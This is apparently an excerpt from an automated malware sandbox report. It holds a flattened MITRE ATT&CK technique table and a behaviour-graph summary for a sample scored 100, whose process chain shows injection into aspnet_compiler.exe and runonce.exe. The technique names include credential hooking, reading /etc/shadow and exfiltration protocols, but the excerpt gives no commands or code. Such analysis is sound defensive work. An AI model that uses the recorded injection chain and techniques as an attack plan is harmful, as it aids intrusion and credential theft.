                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior Graph ID: 1618201, Sample: uI1A364y2P.exe, Startdate: 18/02/2025, Architecture: WINDOWS, Score: 100]
                [Process chain shown in the graph: uI1A364y2P.exe started aspnet_compiler.exe (three times); aspnet_compiler.exe injected zk0NoejtsplNyT.exe; zk0NoejtsplNyT.exe started runonce.exe; runonce.exe injected zk0NoejtsplNyT.exe and started firefox.exe]

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.